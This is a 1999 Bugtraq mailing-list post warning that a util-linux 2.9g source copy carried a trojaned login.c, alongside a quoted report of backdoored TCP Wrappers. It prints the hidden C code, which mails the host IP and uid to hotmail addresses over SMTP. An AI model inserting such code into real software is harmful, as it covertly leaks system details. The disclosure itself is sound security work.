![[LWN Logo]](/images/lwn.banner.gif)
Date: Sat, 23 Jan 1999 22:49:29 -0500
From: John Stange <building@CS.UMD.EDU>
Subject: Re: backdoored tcp wrapper source code
To: BUGTRAQ@NETSPACE.ORG
You may want to have a thorough look at everything you've got... I grabbed
a copy of util-linux2.9g (admittedly being a bad boy and not checking
against anything), and while I don't have a pristine copy of the source
on hand to check, I'm guessing that sendmail and a hotmail address is not
standard behavior for /bin/login:
(from login-utils/login.c)
he = gethostbyname("mail.hotmail.com");
if (!he) exit(0);
ia = (struct in_addr *)he->h_addr_list[0];
l = sizeof(sai);memset(&sai,0,l);
sai.sin_port = htons(25);
sai.sin_addr.s_addr = ia->s_addr;
if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0)
exit(0);
sprintf(b,"\r\nHost = %s\r\nUid =
%i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) <
0) exit(0);
if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0)
exit(0);
sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
etc etc
I'm in a bit of a hurry, so I haven't had a chance to comb anything
else...
> TCP Wrappers is a widely-used security tool to protect UNIX systems
> against intrusion. In has an estimated installed base of millions.
>
> Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
> a backdoored version. Eventually this was bound to happen, and
> that's why the source file is accompanied by a PGP signature. But
> that is no guarantee against people downloading and installing
> backdoored software.
-- John Stange
Staff World, 4120 AVW
x52720